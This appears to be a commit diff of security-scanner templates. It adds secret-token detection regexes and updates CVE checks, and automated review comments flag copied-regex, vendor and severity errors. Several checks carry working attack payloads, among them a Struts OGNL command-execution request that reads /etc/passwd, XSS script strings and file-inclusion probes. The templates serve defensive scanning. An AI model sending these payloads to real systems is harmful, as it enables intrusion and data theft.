author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go
metadata:
verified: true
tags: freshbooks,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- fio-u-(?i)[a-z0-9\-_=]{64}
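Review bot: The extractor regex `fio-u-(?i)[a-z0-9\-_=]{64}` is the Frame.io pattern, copied unchanged from the `frameio-api-token` template. Nothing in it refers to Freshbooks. As written, this template never reports a Freshbooks token, and it reports every Frame.io token a second time under the wrong id. Replace it with the keyword-anchored form the sibling templates use, starting `(?i)(?:freshbooks)(?:[0-9a-z\-_\t .]{0,20})…`, and take the capture group from the gitleaks rule listed under `reference`.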


@ -0,0 +1,22 @@
id: gitter-access-token
info:
name: Gitter Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go
metadata:
verified: true
tags: gitter,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: gocardless-api-token
info:
name: Gocardless API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go
metadata:
verified: true
tags: gocardless,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: grafana-api-key
info:
name: Grafana API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: grafana-cloud-api-token
info:
name: Grafana Cloud API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: grafana-service-account-token
info:
name: Grafana Service Account Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -0,0 +1,22 @@
id: hashicorp-api-token
info:
name: Hashicorp API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go
metadata:
verified: true
tags: hashicorp,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70}


@ -0,0 +1,22 @@
id: zendesk-secret-key
info:
name: Zendesk Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go
metadata:
verified: true
tags: zendesk,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)


@ -1 +1 @@
1.2.6.5
1.2.6.6


@ -1 +1 @@
1.104.0
1.105.0


@ -1 +1 @@
5.6.0
5.6.1


@ -1 +1 @@
2.0.13
2.0.13.1


@ -1 +1 @@
1.7.9
1.8.0


@ -1 +1 @@
5.7.3
5.7.4


@ -1 +1 @@
1.0.119
1.0.119.1


@ -1 +1 @@
1.50.1
1.52.0


@ -1 +1 @@
2.1.0
2.2.0


@ -1 +1 @@
2.3.0
2.3.1


@ -1 +1 @@
7.8.2
7.9.0


@ -1 +1 @@
7.10.1
7.10.2


@ -3,20 +3,25 @@ id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
severity: medium
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
- https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114
remediation: Upgrade to the latest version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2000-0114
cwe-id: NVD-CWE-Other
cvss-score: 5.0
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft,edb
epss-score: 0.09258
cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: internet_information_server
tags: cve,cve2000,frontpage,microsoft,edb
http:
- method: GET
@ -25,11 +30,11 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
- type: status
status:
- 200


@ -3,22 +3,27 @@ id: CVE-2001-0537
info:
name: Cisco IOS HTTP Configuration - Authentication Bypass
author: DhiyaneshDK
severity: medium
severity: critical
description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
reference:
- https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
- http://www.ciac.org/ciac/bulletins/l-106.shtml
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
cvss-score: 9.3
cve-id: CVE-2001-0537
cwe-id: CWE-287
cvss-score: 5.0
epss-score: 0.89071
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: product:"Cisco IOS http config" && 200
vendor: cisco
product: ios
tags: cve,cve2001,cisco,ios,auth-bypass
http:


@ -3,24 +3,26 @@ id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
author: dhiyaneshDk
severity: medium
severity: high
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference:
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
- https://www.exploit-db.com/exploits/21811
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2002-1131
tags: cve2002,edb,xss,squirrelmail,cve
cwe-id: CWE-80
epss-score: 0.06018
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 5
vendor: squirrelmail
product: squirrelmail
tags: cve2002,edb,xss,squirrelmail,cve
http:
- method: GET
@ -32,12 +34,9 @@ http:
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
@ -47,3 +46,7 @@ http:
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -8,16 +8,22 @@ info:
reference:
- https://www.exploit-db.com/exploits/24068
- http://security.gentoo.org/glsa/glsa-200405-16.xml
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
- http://marc.info/?l=bugtraq&m=108334862800260
remediation: Upgrade to the latest version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2004-0519
cwe-id: NVD-CWE-Other
tags: squirrelmail,cve2004,cve,edb,xss
epss-score: 0.02285
cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sgi
product: propack
tags: squirrelmail,cve2004,cve,edb,xss
http:
- method: GET
@ -26,10 +32,6 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
@ -39,3 +41,7 @@ http:
part: header
words:
- "text/html"
- type: status
status:
- 200
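Review bot: The added `cpe`, `vendor` and `product` values name SGI ProPack (`vendor: sgi`, `product: propack`), but the template's tags and references show that it checks SquirrelMail. Anyone selecting or reporting templates by vendor or product will file this finding under the wrong software and miss it when searching for SquirrelMail. The values look like the first CPE in the NVD entry taken over without review. I would set `vendor: squirrelmail`, `product: squirrelmail` and `cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*`, after confirming the affected-version range against the NVD record.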


@ -9,14 +9,19 @@ info:
reference:
- https://www.exploit-db.com/exploits/24055
- https://nvd.nist.gov/vuln/detail/CVE-2004-1965
- http://marc.info/?l=bugtraq&m=108301983206107&w=2
- https://exchange.xforce.ibmcloud.com/vulnerabilities/15966
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2004-1965
cwe-id: NVD-CWE-Other
epss-score: 0.0113
cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: openbb
product: openbb
tags: cve,cve2004,redirect,xss,openbb
http:


@ -9,27 +9,35 @@ info:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
- http://marc.info/?l=bugtraq&m=112240869130356&w=2
- http://securitytracker.com/id?1014584
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2005-2428
cwe-id: CWE-200
tags: domino,edb,cve,cve2005
epss-score: 0.01188
cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ibm
product: lotus_domino
tags: domino,edb,cve,cve2005
http:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: regex
name: domino-username
part: body
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body


@ -9,15 +9,20 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
- http://www.debian.org/security/2005/dsa-884
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
- http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24576
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2005-3344
cwe-id: NVD-CWE-Other
tags: cve,cve2005,horde,unauth
epss-score: 0.02158
cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: horde
product: horde
tags: cve,cve2005,horde,unauth
http:
- method: GET
@ -30,7 +35,6 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- "<title>Horde :: User Administration</title>"


@ -14,14 +14,17 @@ info:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/23031
- https://nvd.nist.gov/vuln/detail/CVE-2005-3634
classification:
cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N)
cvss-score: 5.0
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N
cvss-score: 5
cve-id: CVE-2005-3634
cwe-id: NVD-CWE-Other
cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:*
epss-score: 0.02843
cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"SAP Business Server Pages Team"
vendor: sap
product: sap_web_application_server
tags: cve,cve2005,sap,redirect,business
http:


@ -7,16 +7,20 @@ info:
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
- http://www.vupen.com/english/advisories/2005/2977
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2005-4385
cwe-id: NVD-CWE-Other
tags: cofax,xss,cve,cve2005
epss-score: 0.00294
cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cofax
product: cofax
tags: cofax,xss,cve,cve2005
http:
- method: GET
@ -25,10 +29,11 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
- type: status
status:
- 200
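Review bot: The matchers in the second hunk require the reflected payload in the body and status 200 but put no condition on the response `Content-Type`. A response that echoes the parameter as JSON or plain text would therefore be reported as cross-site scripting even though a browser would not render it. Other XSS templates touched by this commit carry a `type: word` matcher on `part: header` for `text/html`; adding the same matcher here, under the existing `matchers-condition: and`, would cut those false positives. The matcher list appears complete in the hunk, but the request block above it is not visible.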


@ -6,18 +6,22 @@ info:
severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
- http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25698
- https://security.gentoo.org/glsa/202012-09
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2006-1681
cwe-id: NVD-CWE-Other
tags: cherokee,httpd,xss,cve,cve2006
epss-score: 0.01015
cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cherokee
product: cherokee_httpd
tags: cherokee,httpd,xss,cve,cve2006
http:
- method: GET
@ -26,9 +30,6 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
@ -37,3 +38,7 @@ http:
part: header
words:
- text/html
- type: status
status:
- 200


@ -9,16 +9,20 @@ info:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
- ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2006-2842
cwe-id: CWE-22
tags: cve,cve2006,lfi,squirrelmail,edb
epss-score: 0.2925
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: squirrelmail
product: squirrelmail
tags: cve,cve2006,lfi,squirrelmail,edb
http:
- method: GET
@ -27,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"


@ -6,18 +6,20 @@ info:
severity: medium
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2007-0885
cwe-id: NVD-CWE-Other
cvss-score: 6.8
tags: cve,cve2007,jira,xss
epss-score: 0.00694
cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: rainbow_portal
product: rainbow.zen
tags: cve,cve2007,jira,xss
http:
- method: GET
@ -30,11 +32,11 @@ http:
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -3,20 +3,24 @@ id: CVE-2007-4504
info:
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2007-4504
cwe-id: CWE-22
tags: lfi,edb,cve,cve2007,joomla
epss-score: 0.01677
cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: rsfiles
tags: lfi,edb,cve,cve2007,joomla
http:
- method: GET
@ -25,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
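Review bot: The severity of this unauthenticated file-read check drops to `medium` because the classification now carries the CVSS 2.0 vector with `cvss-score: 5` in place of the 3.0 one (assuming the second line of each printed pair is the new side). The same downgrade appears in the sections for CVE-2008-2650, CVE-2008-4764, CVE-2008-6080, CVE-2008-6172, CVE-2008-6222 and CVE-2008-6668, and CVE-2007-4556, whose matcher confirms command output, goes from `critical` to `medium`. Scans and triage rules that filter on `high` or `critical` will stop surfacing these findings after the update. I would keep `severity` tied to the impact the matcher demonstrates, here `severity: high`, and record the v2 vector and score only under `classification`. The `http` block continues outside the hunks.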


@ -3,7 +3,7 @@ id: CVE-2007-4556
info:
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
author: pikpikcu
severity: critical
severity: medium
description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
@ -11,31 +11,37 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
- http://forums.opensymphony.com/ann.jspa?annID=54
- http://issues.apache.org/struts/browse/WW-2030
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2007-4556
cwe-id: NVD-CWE-Other
tags: cve,cve2007,apache,rce,struts
epss-score: 0.14147
cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: opensymphony
product: xwork
tags: cve,cve2007,apache,rce,struts
http:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
part: body
- type: status
status:


@ -8,17 +8,21 @@ info:
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
- http://www.debian.org/security/2008/dsa-1693
- http://www.novell.com/linux/security/advisories/2007_24_sr.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2007-5728
cwe-id: CWE-79
epss-score: 0.03308
cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
vendor: phppgadmin
product: phppgadmin
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
http:
@ -28,16 +32,15 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -10,15 +10,20 @@ info:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
- http://securityreason.com/securityalert/3706
- https://exchange.xforce.ibmcloud.com/vulnerabilities/40829
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2008-1059
cwe-id: CWE-79
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
cwe-id: CWE-94
epss-score: 0.01493
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress
product: sniplets_plugin
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
http:
- method: GET


@ -3,7 +3,7 @@ id: CVE-2008-1061
info:
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: high
severity: medium
description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
@ -11,14 +11,19 @@ info:
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
- http://securityreason.com/securityalert/3706
- https://exchange.xforce.ibmcloud.com/vulnerabilities/40830
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-1061
cwe-id: CWE-79
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
epss-score: 0.00938
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress
product: sniplets_plugin
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
http:
- method: GET


@ -9,16 +9,20 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2008-1547
- https://www.exploit-db.com/exploits/32489
- https://www.securityfocus.com/bid/31765/info
- http://securityreason.com/securityalert/4441
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46061
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-1547
cwe-id: CWE-601
epss-score: 0.03523
cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"Outlook"
vendor: microsoft
product: exchange_server
tags: cve,cve2008,redirect,owa,exchange,microsoft
http:


@ -7,18 +7,20 @@ info:
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
- http://securityreason.com/securityalert/3896
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-2398
cwe-id: CWE-79
cvss-score: 4.3
tags: cve,cve2008,xss
epss-score: 0.00329
cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: appserv_open_project
product: appserv
tags: cve,cve2008,xss
http:
- method: GET
@ -27,15 +29,16 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=confirm('xss')>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=confirm('xss')>"
part: body
- type: word
words:
- "text/html"
part: header


@ -3,22 +3,27 @@ id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
severity: medium
description: |
